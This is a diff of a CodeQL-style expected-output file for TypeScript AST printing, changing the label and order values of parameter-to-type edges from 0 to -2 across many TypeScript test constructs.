tst.ts:104:16:104:16 | [SimpleParameter] s | tst.ts:104:19:104:24 | [KeywordTypeExpr] string | semmle.label | 0 | -| tst.ts:104:16:104:16 | [SimpleParameter] s | tst.ts:104:19:104:24 | [KeywordTypeExpr] string | semmle.order | 0 | +| tst.ts:104:16:104:16 | [SimpleParameter] s | tst.ts:104:19:104:24 | [KeywordTypeExpr] string | semmle.label | -2 | +| tst.ts:104:16:104:16 | [SimpleParameter] s | tst.ts:104:19:104:24 | [KeywordTypeExpr] string | semmle.order | -2 | | tst.ts:104:28:104:44 | [TemplateLiteralTypeExpr] `hello ${string}` | tst.ts:104:29:104:34 | [LiteralTypeExpr] hello | semmle.label | 1 | | tst.ts:104:28:104:44 | [TemplateLiteralTypeExpr] `hello ${string}` | tst.ts:104:29:104:34 | [LiteralTypeExpr] hello | semmle.order | 1 | | tst.ts:104:28:104:44 | [TemplateLiteralTypeExpr] `hello ${string}` | tst.ts:104:37:104:42 | [KeywordTypeExpr] string | semmle.label | 2 | @@ -2877,8 +2877,8 @@ edges | tst.ts:133:3:138:3 | [FunctionDeclStmt] functio ... } } | tst.ts:133:12:133:14 | [VarDecl] foo | semmle.order | 0 | | tst.ts:133:3:138:3 | [FunctionDeclStmt] functio ... } } | tst.ts:133:30:138:3 | [BlockStmt] { c ... } } | semmle.label | 5 | | tst.ts:133:3:138:3 | [FunctionDeclStmt] functio ... } } | tst.ts:133:30:138:3 | [BlockStmt] { c ... } } | semmle.order | 5 | -| tst.ts:133:16:133:18 | [SimpleParameter] arg | tst.ts:133:21:133:27 | [KeywordTypeExpr] unknown | semmle.label | 0 | -| tst.ts:133:16:133:18 | [SimpleParameter] arg | tst.ts:133:21:133:27 | [KeywordTypeExpr] unknown | semmle.order | 0 | +| tst.ts:133:16:133:18 | [SimpleParameter] arg | tst.ts:133:21:133:27 | [KeywordTypeExpr] unknown | semmle.label | -2 | +| tst.ts:133:16:133:18 | [SimpleParameter] arg | tst.ts:133:21:133:27 | [KeywordTypeExpr] unknown | semmle.order | -2 | | tst.ts:133:30:138:3 | [BlockStmt] { c ... } } | tst.ts:134:5:134:48 | [DeclStmt] const argIsString = ... | semmle.label | 1 | | tst.ts:133:30:138:3 | [BlockStmt] { c ... } } | tst.ts:134:5:134:48 | [DeclStmt] const argIsString = ... | semmle.order | 1 | | tst.ts:133:30:138:3 | [BlockStmt] { c ... } } | tst.ts:135:5:137:5 | [IfStmt] if (arg ... ; } | semmle.label | 2 | @@ -2953,8 +2953,8 @@ edges | tst.ts:144:3:149:3 | [FunctionDeclStmt] functio ... ; } } | tst.ts:144:32:144:37 | [KeywordTypeExpr] number | semmle.order | 4 | | tst.ts:144:3:149:3 | [FunctionDeclStmt] functio ... ; } } | tst.ts:144:39:149:3 | [BlockStmt] { ... ; } } | semmle.label | 5 | | tst.ts:144:3:149:3 | [FunctionDeclStmt] functio ... ; } } | tst.ts:144:39:149:3 | [BlockStmt] { ... ; } } | semmle.order | 5 | -| tst.ts:144:17:144:21 | [SimpleParameter] shape | tst.ts:144:24:144:28 | [LocalTypeAccess] Shape | semmle.label | 0 | -| tst.ts:144:17:144:21 | [SimpleParameter] shape | tst.ts:144:24:144:28 | [LocalTypeAccess] Shape | semmle.order | 0 | +| tst.ts:144:17:144:21 | [SimpleParameter] shape | tst.ts:144:24:144:28 | [LocalTypeAccess] Shape | semmle.label | -2 | +| tst.ts:144:17:144:21 | [SimpleParameter] shape | tst.ts:144:24:144:28 | [LocalTypeAccess] Shape | semmle.order | -2 | | tst.ts:144:39:149:3 | [BlockStmt] { ... ; } } | tst.ts:145:7:145:29 | [DeclStmt] const { ... shape; | semmle.label | 1 | | tst.ts:144:39:149:3 | [BlockStmt] { ... ; } } | tst.ts:145:7:145:29 | [DeclStmt] const { ... shape; | semmle.order | 1 | | tst.ts:144:39:149:3 | [BlockStmt] { ... ; } } | tst.ts:147:7:148:39 | [IfStmt] if (kin ... ngth; } | semmle.label | 2 | @@ -3025,24 +3025,24 @@ edges | tst.ts:153:7:153:28 | [FunctionExpr] [sym: s ... number; | tst.ts:153:22:153:27 | [KeywordTypeExpr] number | semmle.order | 4 | | tst.ts:153:7:153:28 | [IndexSignature] [sym: s ... number; | tst.ts:153:7:153:28 | [FunctionExpr] [sym: s ... number; | semmle.label | 1 | | tst.ts:153:7:153:28 | [IndexSignature] [sym: s ... number; | tst.ts:153:7:153:28 | [FunctionExpr] [sym: s ... number; | semmle.order | 1 | -| tst.ts:153:8:153:10 | [SimpleParameter] sym | tst.ts:153:13:153:18 | [KeywordTypeExpr] symbol | semmle.label | 0 | -| tst.ts:153:8:153:10 | [SimpleParameter] sym | tst.ts:153:13:153:18 | [KeywordTypeExpr] symbol | semmle.order | 0 | +| tst.ts:153:8:153:10 | [SimpleParameter] sym | tst.ts:153:13:153:18 | [KeywordTypeExpr] symbol | semmle.label | -2 | +| tst.ts:153:8:153:10 | [SimpleParameter] sym | tst.ts:153:13:153:18 | [KeywordTypeExpr] symbol | semmle.order | -2 | | tst.ts:154:7:154:28 | [FunctionExpr] [key: s ... string; | file://:0:0:0:0 | (Parameters) | semmle.label | 1 | | tst.ts:154:7:154:28 | [FunctionExpr] [key: s ... string; | file://:0:0:0:0 | (Parameters) | semmle.order | 1 | | tst.ts:154:7:154:28 | [FunctionExpr] [key: s ... string; | tst.ts:154:22:154:27 | [KeywordTypeExpr] string | semmle.label | 4 | | tst.ts:154:7:154:28 | [FunctionExpr] [key: s ... string; | tst.ts:154:22:154:27 | [KeywordTypeExpr] string | semmle.order | 4 | | tst.ts:154:7:154:28 | [IndexSignature] [key: s ... string; | tst.ts:154:7:154:28 | [FunctionExpr] [key: s ... string; | semmle.label | 1 | | tst.ts:154:7:154:28 | [IndexSignature] [key: s ... string; | tst.ts:154:7:154:28 | [FunctionExpr] [key: s ... string; | semmle.order | 1 | -| tst.ts:154:8:154:10 | [SimpleParameter] key | tst.ts:154:13:154:18 | [KeywordTypeExpr] string | semmle.label | 0 | -| tst.ts:154:8:154:10 | [SimpleParameter] key | tst.ts:154:13:154:18 | [KeywordTypeExpr] string | semmle.order | 0 | +| tst.ts:154:8:154:10 | [SimpleParameter] key | tst.ts:154:13:154:18 | [KeywordTypeExpr] string | semmle.label | -2 | +| tst.ts:154:8:154:10 | [SimpleParameter] key | tst.ts:154:13:154:18 | [KeywordTypeExpr] string | semmle.order | -2 | | tst.ts:155:7:155:29 | [FunctionExpr] [num: n ... oolean; | file://:0:0:0:0 | (Parameters) | semmle.label | 1 | | tst.ts:155:7:155:29 | [FunctionExpr] [num: n ... oolean; | file://:0:0:0:0 | (Parameters) | semmle.order | 1 | | tst.ts:155:7:155:29 | [FunctionExpr] [num: n ... oolean; | tst.ts:155:22:155:28 | [KeywordTypeExpr] boolean | semmle.label | 4 | | tst.ts:155:7:155:29 | [FunctionExpr] [num: n ... oolean; | tst.ts:155:22:155:28 | [KeywordTypeExpr] boolean | semmle.order | 4 | | tst.ts:155:7:155:29 | [IndexSignature] [num: n ... oolean; | tst.ts:155:7:155:29 | [FunctionExpr] [num: n ... oolean; | semmle.label | 1 | | tst.ts:155:7:155:29 | [IndexSignature] [num: n ... oolean; | tst.ts:155:7:155:29 | [FunctionExpr] [num: n ... oolean; | semmle.order | 1 | -| tst.ts:155:8:155:10 | [SimpleParameter] num | tst.ts:155:13:155:18 | [KeywordTypeExpr] number | semmle.label | 0 | -| tst.ts:155:8:155:10 | [SimpleParameter] num | tst.ts:155:13:155:18 | [KeywordTypeExpr] number | semmle.order | 0 | +| tst.ts:155:8:155:10 | [SimpleParameter] num | tst.ts:155:13:155:18 | [KeywordTypeExpr] number | semmle.label | -2 | +| tst.ts:155:8:155:10 | [SimpleParameter] num | tst.ts:155:13:155:18 | [KeywordTypeExpr] number | semmle.order | -2 | | tst.ts:158:5:158:28 | [DeclStmt] let colors = ... | tst.ts:158:9:158:27 | [VariableDeclarator] colors: Colors = {} | semmle.label | 1 | | tst.ts:158:5:158:28 | [DeclStmt] let colors = ... | tst.ts:158:9:158:27 | [VariableDeclarator] colors: Colors = {} | semmle.order | 1 | | tst.ts:158:9:158:27 | [VariableDeclarator] colors: Colors = {} | tst.ts:158:9:158:14 | [VarDecl] colors | semmle.label | 1 | @@ -3111,8 +3111,8 @@ edges | tst.ts:166:7:166:37 | [FunctionExpr] [key: ` ... number; | tst.ts:166:31:166:36 | [KeywordTypeExpr] number | semmle.order | 4 | | tst.ts:166:7:166:37 | [IndexSignature] [key: ` ... number; | tst.ts:166:7:166:37 | [FunctionExpr] [key: ` ... number; | semmle.label | 1 | | tst.ts:166:7:166:37 | [IndexSignature] [key: ` ... number; | tst.ts:166:7:166:37 | [FunctionExpr] [key: ` ... number; | semmle.order | 1 | -| tst.ts:166:8:166:10 | [SimpleParameter] key | tst.ts:166:13:166:27 | [TemplateLiteralTypeExpr] `foo-${number}` | semmle.label | 0 | -| tst.ts:166:8:166:10 | [SimpleParameter] key | tst.ts:166:13:166:27 | [TemplateLiteralTypeExpr] `foo-${number}` | semmle.order | 0 | +| tst.ts:166:8:166:10 | [SimpleParameter] key | tst.ts:166:13:166:27 | [TemplateLiteralTypeExpr] `foo-${number}` | semmle.label | -2 | +| tst.ts:166:8:166:10 | [SimpleParameter] key | tst.ts:166:13:166:27 | [TemplateLiteralTypeExpr] `foo-${number}` | semmle.order | -2 | | tst.ts:166:13:166:27 | [TemplateLiteralTypeExpr] `foo-${number}` | tst.ts:166:14:166:17 | [LiteralTypeExpr] foo- | semmle.label | 1 | | tst.ts:166:13:166:27 | [TemplateLiteralTypeExpr] `foo-${number}` | tst.ts:166:14:166:17 | [LiteralTypeExpr] foo- | semmle.order | 1 | | tst.ts:166:13:166:27 | [TemplateLiteralTypeExpr] `foo-${number}` | tst.ts:166:20:166:25 | [KeywordTypeExpr] number | semmle.label | 2 | @@ -3147,8 +3147,8 @@ edges | tst.ts:172:7:172:42 | [FunctionExpr] [optNam ... oolean; | tst.ts:172:35:172:41 | [KeywordTypeExpr] boolean | semmle.order | 4 | | tst.ts:172:7:172:42 | [IndexSignature] [optNam ... oolean; | tst.ts:172:7:172:42 | [FunctionExpr] [optNam ... oolean; | semmle.label | 1 | | tst.ts:172:7:172:42 | [IndexSignature] [optNam ... oolean; | tst.ts:172:7:172:42 | [FunctionExpr] [optNam ... oolean; | semmle.order | 1 | -| tst.ts:172:8:172:14 | [SimpleParameter] optName | tst.ts:172:17:172:31 | [UnionTypeExpr] string \| symbol | semmle.label | 0 | -| tst.ts:172:8:172:14 | [SimpleParameter] optName | tst.ts:172:17:172:31 | [UnionTypeExpr] string \| symbol | semmle.order | 0 | +| tst.ts:172:8:172:14 | [SimpleParameter] optName | tst.ts:172:17:172:31 | [UnionTypeExpr] string \| symbol | semmle.label | -2 | +| tst.ts:172:8:172:14 | [SimpleParameter] optName | tst.ts:172:17:172:31 | [UnionTypeExpr] string \| symbol | semmle.order | -2 | | tst.ts:172:17:172:31 | [UnionTypeExpr] string \| symbol | tst.ts:172:17:172:22 | [KeywordTypeExpr] string | semmle.label | 1 | | tst.ts:172:17:172:31 | [UnionTypeExpr] string \| symbol | tst.ts:172:17:172:22 | [KeywordTypeExpr] string | semmle.order | 1 | | tst.ts:172:17:172:31 | [UnionTypeExpr] string \| symbol | tst.ts:172:26:172:31 | [KeywordTypeExpr] symbol | semmle.label | 2 | @@ -3343,8 +3343,8 @@ edges | tst.ts:215:10:220:3 | [FunctionDeclStmt] functio ... } } | tst.ts:215:19:215:25 | [VarDecl] handler | semmle.order | 0 | | tst.ts:215:10:220:3 | [FunctionDeclStmt] functio ... } } | tst.ts:215:47:220:3 | [BlockStmt] { ... } } | semmle.label | 5 | | tst.ts:215:10:220:3 | [FunctionDeclStmt] functio ... } } | tst.ts:215:47:220:3 | [BlockStmt] { ... } } | semmle.order | 5 | -| tst.ts:215:27:215:27 | [SimpleParameter] r | tst.ts:215:30:215:44 | [UnionTypeExpr] Success \| Error | semmle.label | 0 | -| tst.ts:215:27:215:27 | [SimpleParameter] r | tst.ts:215:30:215:44 | [UnionTypeExpr] Success \| Error | semmle.order | 0 | +| tst.ts:215:27:215:27 | [SimpleParameter] r | tst.ts:215:30:215:44 | [UnionTypeExpr] Success \| Error | semmle.label | -2 | +| tst.ts:215:27:215:27 | [SimpleParameter] r | tst.ts:215:30:215:44 | [UnionTypeExpr] Success \| Error | semmle.order | -2 | | tst.ts:215:30:215:44 | [UnionTypeExpr] Success \| Error | tst.ts:215:30:215:36 | [LocalTypeAccess] Success | semmle.label | 1 | | tst.ts:215:30:215:44 | [UnionTypeExpr] Success \| Error | tst.ts:215:30:215:36 | [LocalTypeAccess] Success | semmle.order | 1 | | tst.ts:215:30:215:44 | [UnionTypeExpr] Success \| Error | tst.ts:215:40:215:44 | [LocalTypeAccess] Error | semmle.label | 2 | @@ -3395,8 +3395,8 @@ edges | tst.ts:224:5:226:5 | [FunctionExpr] constru ... ; } | file://:0:0:0:0 | (Parameters) | semmle.order | 1 | | tst.ts:224:5:226:5 | [FunctionExpr] constru ... ; } | tst.ts:224:31:226:5 | [BlockStmt] { ... ; } | semmle.label | 5 | | tst.ts:224:5:226:5 | [FunctionExpr] constru ... ; } | tst.ts:224:31:226:5 | [BlockStmt] { ... ; } | semmle.order | 5 | -| tst.ts:224:17:224:20 | [SimpleParameter] name | tst.ts:224:23:224:28 | [KeywordTypeExpr] string | semmle.label | 0 | -| tst.ts:224:17:224:20 | [SimpleParameter] name | tst.ts:224:23:224:28 | [KeywordTypeExpr] string | semmle.order | 0 | +| tst.ts:224:17:224:20 | [SimpleParameter] name | tst.ts:224:23:224:28 | [KeywordTypeExpr] string | semmle.label | -2 | +| tst.ts:224:17:224:20 | [SimpleParameter] name | tst.ts:224:23:224:28 | [KeywordTypeExpr] string | semmle.order | -2 | | tst.ts:224:31:226:5 | [BlockStmt] { ... ; } | tst.ts:225:9:225:26 | [ExprStmt] this.#name = name; | semmle.label | 1 | | tst.ts:224:31:226:5 | [BlockStmt] { ... ; } | tst.ts:225:9:225:26 | [ExprStmt] this.#name = name; | semmle.order | 1 | | tst.ts:225:9:225:18 | [DotExpr] this.#name | tst.ts:225:9:225:12 | [ThisExpr] this | semmle.label | 1 | @@ -3417,8 +3417,8 @@ edges | tst.ts:228:5:233:5 | [FunctionExpr] equals( ... . } | file://:0:0:0:0 | (Parameters) | semmle.order | 1 | | tst.ts:228:5:233:5 | [FunctionExpr] equals( ... . } | tst.ts:228:28:233:5 | [BlockStmt] { ... . } | semmle.label | 5 | | tst.ts:228:5:233:5 | [FunctionExpr] equals( ... . } | tst.ts:228:28:233:5 | [BlockStmt] { ... . } | semmle.order | 5 | -| tst.ts:228:12:228:16 | [SimpleParameter] other | tst.ts:228:19:228:25 | [KeywordTypeExpr] unknown | semmle.label | 0 | -| tst.ts:228:12:228:16 | [SimpleParameter] other | tst.ts:228:19:228:25 | [KeywordTypeExpr] unknown | semmle.order | 0 | +| tst.ts:228:12:228:16 | [SimpleParameter] other | tst.ts:228:19:228:25 | [KeywordTypeExpr] unknown | semmle.label | -2 | +| tst.ts:228:12:228:16 | [SimpleParameter] other | tst.ts:228:19:228:25 | [KeywordTypeExpr] unknown | semmle.order | -2 | | tst.ts:228:28:233:5 | [BlockStmt] { ... . } | tst.ts:229:9:232:39 | [ReturnStmt] return ... .#name; | semmle.label | 1 | | tst.ts:228:28:233:5 | [BlockStmt] { ... . } | tst.ts:229:9:232:39 | [ReturnStmt] return ... .#name; | semmle.order | 1 | | tst.ts:229:9:232:39 | [ReturnStmt] return ... .#name; | tst.ts:229:16:232:38 | [BinaryExpr] other & ... r.#name | semmle.label | 1 | @@ -3579,8 +3579,8 @@ edges | tst.ts:256:3:263:3 | [FunctionDeclStmt] functio ... } } | tst.ts:256:12:256:24 | [VarDecl] processAction | semmle.order | 0 | | tst.ts:256:3:263:3 | [FunctionDeclStmt] functio ... } } | tst.ts:256:42:263:3 | [BlockStmt] { c ... } } | semmle.label | 5 | | tst.ts:256:3:263:3 | [FunctionDeclStmt] functio ... } } | tst.ts:256:42:263:3 | [BlockStmt] { c ... } } | semmle.order | 5 | -| tst.ts:256:26:256:31 | [SimpleParameter] action | tst.ts:256:34:256:39 | [LocalTypeAccess] Action | semmle.label | 0 | -| tst.ts:256:26:256:31 | [SimpleParameter] action | tst.ts:256:34:256:39 | [LocalTypeAccess] Action | semmle.order | 0 | +| tst.ts:256:26:256:31 | [SimpleParameter] action | tst.ts:256:34:256:39 | [LocalTypeAccess] Action | semmle.label | -2 | +| tst.ts:256:26:256:31 | [SimpleParameter] action | tst.ts:256:34:256:39 | [LocalTypeAccess] Action | semmle.order | -2 | | tst.ts:256:42:263:3 | [BlockStmt] { c ... } } | tst.ts:257:5:257:37 | [DeclStmt] const { ... action; | semmle.label | 1 | | tst.ts:256:42:263:3 | [BlockStmt] { c ... } } | tst.ts:257:5:257:37 | [DeclStmt] const { ... action; | semmle.order | 1 | | tst.ts:256:42:263:3 | [BlockStmt] { c ... } } | tst.ts:258:5:262:5 | [IfStmt] if (kin ... g } | semmle.label | 2 | @@ -3719,8 +3719,8 @@ edges | tst.ts:274:10:274:32 | [FunctionExpr] (p: Typ ... => void | tst.ts:274:29:274:32 | [KeywordTypeExpr] void | semmle.order | 4 | | tst.ts:274:10:274:32 | [FunctionTypeExpr] (p: Typ ... => void | tst.ts:274:10:274:32 | [FunctionExpr] (p: Typ ... => void | semmle.label | 1 | | tst.ts:274:10:274:32 | [FunctionTypeExpr] (p: Typ ... => void | tst.ts:274:10:274:32 | [FunctionExpr] (p: Typ ... => void | semmle.order | 1 | -| tst.ts:274:11:274:11 | [SimpleParameter] p | tst.ts:274:14:274:23 | [IndexedAccessTypeExpr] TypeMap[K] | semmle.label | 0 | -| tst.ts:274:11:274:11 | [SimpleParameter] p | tst.ts:274:14:274:23 | [IndexedAccessTypeExpr] TypeMap[K] | semmle.order | 0 | +| tst.ts:274:11:274:11 | [SimpleParameter] p | tst.ts:274:14:274:23 | [IndexedAccessTypeExpr] TypeMap[K] | semmle.label | -2 | +| tst.ts:274:11:274:11 | [SimpleParameter] p | tst.ts:274:14:274:23 | [IndexedAccessTypeExpr] TypeMap[K] | semmle.order | -2 | | tst.ts:274:14:274:23 | [IndexedAccessTypeExpr] TypeMap[K] | tst.ts:274:14:274:20 | [LocalTypeAccess] TypeMap | semmle.label | 1 | | tst.ts:274:14:274:23 | [IndexedAccessTypeExpr] TypeMap[K] | tst.ts:274:14:274:20 | [LocalTypeAccess] TypeMap | semmle.order | 1 | | tst.ts:274:14:274:23 | [IndexedAccessTypeExpr] TypeMap[K] | tst.ts:274:22:274:22 | [LocalTypeAccess] K | semmle.label | 2 | @@ -3739,8 +3739,8 @@ edges | tst.ts:278:26:278:48 | [TypeParameter] K exten ... TypeMap | tst.ts:278:36:278:48 | [KeyofTypeExpr] keyof TypeMap | semmle.order | 2 | | tst.ts:278:36:278:48 | [KeyofTypeExpr] keyof TypeMap | tst.ts:278:42:278:48 | [LocalTypeAccess] TypeMap | semmle.label | 1 | | tst.ts:278:36:278:48 | [KeyofTypeExpr] keyof TypeMap | tst.ts:278:42:278:48 | [LocalTypeAccess] TypeMap | semmle.order | 1 | -| tst.ts:278:51:278:56 | [SimpleParameter] record | tst.ts:278:59:278:72 | [GenericTypeExpr] UnionRecord | semmle.label | 0 | -| tst.ts:278:51:278:56 | [SimpleParameter] record | tst.ts:278:59:278:72 | [GenericTypeExpr] UnionRecord | semmle.order | 0 | +| tst.ts:278:51:278:56 | [SimpleParameter] record | tst.ts:278:59:278:72 | [GenericTypeExpr] UnionRecord | semmle.label | -2 | +| tst.ts:278:51:278:56 | [SimpleParameter] record | tst.ts:278:59:278:72 | [GenericTypeExpr] UnionRecord | semmle.order | -2 | | tst.ts:278:59:278:72 | [GenericTypeExpr] UnionRecord | tst.ts:278:59:278:69 | [LocalTypeAccess] UnionRecord | semmle.label | 1 | | tst.ts:278:59:278:72 | [GenericTypeExpr] UnionRecord | tst.ts:278:59:278:69 | [LocalTypeAccess] UnionRecord | semmle.order | 1 | | tst.ts:278:59:278:72 | [GenericTypeExpr] UnionRecord | tst.ts:278:71:278:71 | [LocalTypeAccess] K | semmle.label | 2 | @@ -3811,8 +3811,8 @@ edges | tst.ts:289:15:289:62 | [FunctionExpr] (...arg ... => void | tst.ts:289:59:289:62 | [KeywordTypeExpr] void | semmle.order | 4 | | tst.ts:289:15:289:62 | [FunctionTypeExpr] (...arg ... => void | tst.ts:289:15:289:62 | [FunctionExpr] (...arg ... => void | semmle.label | 1 | | tst.ts:289:15:289:62 | [FunctionTypeExpr] (...arg ... => void | tst.ts:289:15:289:62 | [FunctionExpr] (...arg ... => void | semmle.order | 1 | -| tst.ts:289:19:289:22 | [SimpleParameter] args | tst.ts:289:25:289:53 | [UnionTypeExpr] ["a", n ... string] | semmle.label | 0 | -| tst.ts:289:19:289:22 | [SimpleParameter] args | tst.ts:289:25:289:53 | [UnionTypeExpr] ["a", n ... string] | semmle.order | 0 | +| tst.ts:289:19:289:22 | [SimpleParameter] args | tst.ts:289:25:289:53 | [UnionTypeExpr] ["a", n ... string] | semmle.label | -2 | +| tst.ts:289:19:289:22 | [SimpleParameter] args | tst.ts:289:25:289:53 | [UnionTypeExpr] ["a", n ... string] | semmle.order | -2 | | tst.ts:289:25:289:37 | [TupleTypeExpr] ["a", number] | tst.ts:289:26:289:28 | [LiteralTypeExpr] "a" | semmle.label | 1 | | tst.ts:289:25:289:37 | [TupleTypeExpr] ["a", number] | tst.ts:289:26:289:28 | [LiteralTypeExpr] "a" | semmle.order | 1 | | tst.ts:289:25:289:37 | [TupleTypeExpr] ["a", number] | tst.ts:289:31:289:36 | [KeywordTypeExpr] number | semmle.label | 2 | @@ -3947,8 +3947,8 @@ edges | tst.ts:313:1:316:10 | [FunctionDeclStmt] functio ... void {} | tst.ts:316:9:316:10 | [BlockStmt] {} | semmle.order | 5 | | tst.ts:313:12:313:12 | [TypeParameter] T | tst.ts:313:12:313:12 | [Identifier] T | semmle.label | 1 | | tst.ts:313:12:313:12 | [TypeParameter] T | tst.ts:313:12:313:12 | [Identifier] T | semmle.order | 1 | -| tst.ts:313:15:313:17 | [SimpleParameter] arg | tst.ts:313:20:315:27 | [InterfaceTypeExpr] { pro ... void } | semmle.label | 0 | -| tst.ts:313:15:313:17 | [SimpleParameter] arg | tst.ts:313:20:315:27 | [InterfaceTypeExpr] { pro ... void } | semmle.order | 0 | +| tst.ts:313:15:313:17 | [SimpleParameter] arg | tst.ts:313:20:315:27 | [InterfaceTypeExpr] { pro ... void } | semmle.label | -2 | +| tst.ts:313:15:313:17 | [SimpleParameter] arg | tst.ts:313:20:315:27 | [InterfaceTypeExpr] { pro ... void } | semmle.order | -2 | | tst.ts:313:20:315:27 | [InterfaceTypeExpr] { pro ... void } | tst.ts:314:3:314:28 | [FieldDeclaration] produce ... ) => T, | semmle.label | 1 | | tst.ts:313:20:315:27 | [InterfaceTypeExpr] { pro ... void } | tst.ts:314:3:314:28 | [FieldDeclaration] produce ... ) => T, | semmle.order | 1 | | tst.ts:313:20:315:27 | [InterfaceTypeExpr] { pro ... void } | tst.ts:315:3:315:25 | [FieldDeclaration] consume ... => void | semmle.label | 2 | @@ -3963,8 +3963,8 @@ edges | tst.ts:314:12:314:27 | [FunctionExpr] (n: string) => T | tst.ts:314:27:314:27 | [LocalTypeAccess] T | semmle.order | 4 | | tst.ts:314:12:314:27 | [FunctionTypeExpr] (n: string) => T | tst.ts:314:12:314:27 | [FunctionExpr] (n: string) => T | semmle.label | 1 | | tst.ts:314:12:314:27 | [FunctionTypeExpr] (n: string) => T | tst.ts:314:12:314:27 | [FunctionExpr] (n: string) => T | semmle.order | 1 | -| tst.ts:314:13:314:13 | [SimpleParameter] n | tst.ts:314:16:314:21 | [KeywordTypeExpr] string | semmle.label | 0 | -| tst.ts:314:13:314:13 | [SimpleParameter] n | tst.ts:314:16:314:21 | [KeywordTypeExpr] string | semmle.order | 0 | +| tst.ts:314:13:314:13 | [SimpleParameter] n | tst.ts:314:16:314:21 | [KeywordTypeExpr] string | semmle.label | -2 | +| tst.ts:314:13:314:13 | [SimpleParameter] n | tst.ts:314:16:314:21 | [KeywordTypeExpr] string | semmle.order | -2 | | tst.ts:315:3:315:25 | [FieldDeclaration] consume ... => void | tst.ts:315:3:315:9 | [Label] consume | semmle.label | 1 | | tst.ts:315:3:315:25 | [FieldDeclaration] consume ... => void | tst.ts:315:3:315:9 | [Label] consume | semmle.order | 1 | | tst.ts:315:3:315:25 | [FieldDeclaration] consume ... => void | tst.ts:315:12:315:25 | [FunctionTypeExpr] (x: T) => void | semmle.label | 2 | @@ -3975,8 +3975,8 @@ edges | tst.ts:315:12:315:25 | [FunctionExpr] (x: T) => void | tst.ts:315:22:315:25 | [KeywordTypeExpr] void | semmle.order | 4 | | tst.ts:315:12:315:25 | [FunctionTypeExpr] (x: T) => void | tst.ts:315:12:315:25 | [FunctionExpr] (x: T) => void | semmle.label | 1 | | tst.ts:315:12:315:25 | [FunctionTypeExpr] (x: T) => void | tst.ts:315:12:315:25 | [FunctionExpr] (x: T) => void | semmle.order | 1 | -| tst.ts:315:13:315:13 | [SimpleParameter] x | tst.ts:315:16:315:16 | [LocalTypeAccess] T | semmle.label | 0 | -| tst.ts:315:13:315:13 | [SimpleParameter] x | tst.ts:315:16:315:16 | [LocalTypeAccess] T | semmle.order | 0 | +| tst.ts:315:13:315:13 | [SimpleParameter] x | tst.ts:315:16:315:16 | [LocalTypeAccess] T | semmle.label | -2 | +| tst.ts:315:13:315:13 | [SimpleParameter] x | tst.ts:315:16:315:16 | [LocalTypeAccess] T | semmle.order | -2 | | tst.ts:318:1:321:2 | [CallExpr] f({ p ... se() }) | file://:0:0:0:0 | (Arguments) | semmle.label | 1 | | tst.ts:318:1:321:2 | [CallExpr] f({ p ... se() }) | file://:0:0:0:0 | (Arguments) | semmle.order | 1 | | tst.ts:318:1:321:2 | [CallExpr] f({ p ... se() }) | tst.ts:318:1:318:1 | [VarRef] f | semmle.label | 0 | @@ -4113,8 +4113,8 @@ edges | tst.ts:344:8:344:25 | [FunctionExpr] (value: T) => void | tst.ts:344:22:344:25 | [KeywordTypeExpr] void | semmle.order | 4 | | tst.ts:344:8:344:25 | [FunctionTypeExpr] (value: T) => void | tst.ts:344:8:344:25 | [FunctionExpr] (value: T) => void | semmle.label | 1 | | tst.ts:344:8:344:25 | [FunctionTypeExpr] (value: T) => void | tst.ts:344:8:344:25 | [FunctionExpr] (value: T) => void | semmle.order | 1 | -| tst.ts:344:9:344:13 | [SimpleParameter] value | tst.ts:344:16:344:16 | [LocalTypeAccess] T | semmle.label | 0 | -| tst.ts:344:9:344:13 | [SimpleParameter] value | tst.ts:344:16:344:16 | [LocalTypeAccess] T | semmle.order | 0 | +| tst.ts:344:9:344:13 | [SimpleParameter] value | tst.ts:344:16:344:16 | [LocalTypeAccess] T | semmle.label | -2 | +| tst.ts:344:9:344:13 | [SimpleParameter] value | tst.ts:344:16:344:16 | [LocalTypeAccess] T | semmle.order | -2 | | tst.ts:347:1:350:1 | [DeclStmt] const state = ... | tst.ts:347:7:350:1 | [VariableDeclarator] state: ... > { } } | semmle.label | 1 | | tst.ts:347:1:350:1 | [DeclStmt] const state = ... | tst.ts:347:7:350:1 | [VariableDeclarator] state: ... > { } } | semmle.order | 1 | | tst.ts:347:7:350:1 | [VariableDeclarator] state: ... > { } } | tst.ts:347:7:347:11 | [VarDecl] state | semmle.label | 1 | @@ -4277,10 +4277,10 @@ edges | tst.ts:383:5:383:54 | [FunctionDeclStmt] declare ... T): T; | tst.ts:383:53:383:53 | [LocalTypeAccess] T | semmle.order | 4 | | tst.ts:383:37:383:37 | [TypeParameter] T | tst.ts:383:37:383:37 | [Identifier] T | semmle.label | 1 | | tst.ts:383:37:383:37 | [TypeParameter] T | tst.ts:383:37:383:37 | [Identifier] T | semmle.order | 1 | -| tst.ts:383:40:383:40 | [SimpleParameter] x | tst.ts:383:43:383:43 | [LocalTypeAccess] T | semmle.label | 0 | -| tst.ts:383:40:383:40 | [SimpleParameter] x | tst.ts:383:43:383:43 | [LocalTypeAccess] T | semmle.order | 0 | -| tst.ts:383:46:383:46 | [SimpleParameter] y | tst.ts:383:49:383:49 | [LocalTypeAccess] T | semmle.label | 0 | -| tst.ts:383:46:383:46 | [SimpleParameter] y | tst.ts:383:49:383:49 | [LocalTypeAccess] T | semmle.order | 0 | +| tst.ts:383:40:383:40 | [SimpleParameter] x | tst.ts:383:43:383:43 | [LocalTypeAccess] T | semmle.label | -2 | +| tst.ts:383:40:383:40 | [SimpleParameter] x | tst.ts:383:43:383:43 | [LocalTypeAccess] T | semmle.order | -2 | +| tst.ts:383:46:383:46 | [SimpleParameter] y | tst.ts:383:49:383:49 | [LocalTypeAccess] T | semmle.label | -2 | +| tst.ts:383:46:383:46 | [SimpleParameter] y | tst.ts:383:49:383:49 | [LocalTypeAccess] T | semmle.order | -2 | | tst.ts:385:5:385:74 | [DeclStmt] let [a, ... ye!"]); | tst.ts:385:9:385:73 | [VariableDeclarator] [a, b, ... bye!"]) | semmle.label | 1 | | tst.ts:385:5:385:74 | [DeclStmt] let [a, ... ye!"]); | tst.ts:385:9:385:73 | [VariableDeclarator] [a, b, ... bye!"]) | semmle.order | 1 | | tst.ts:385:9:385:17 | [ArrayPattern] [a, b, c] | tst.ts:385:10:385:10 | [VarDecl] a | semmle.label | 1 | @@ -4443,8 +4443,8 @@ edges | tst.ts:412:3:416:3 | [FunctionDeclStmt] functio ... } } | tst.ts:412:12:412:19 | [VarDecl] setColor | semmle.order | 0 | | tst.ts:412:3:416:3 | [FunctionDeclStmt] functio ... } } | tst.ts:412:45:416:3 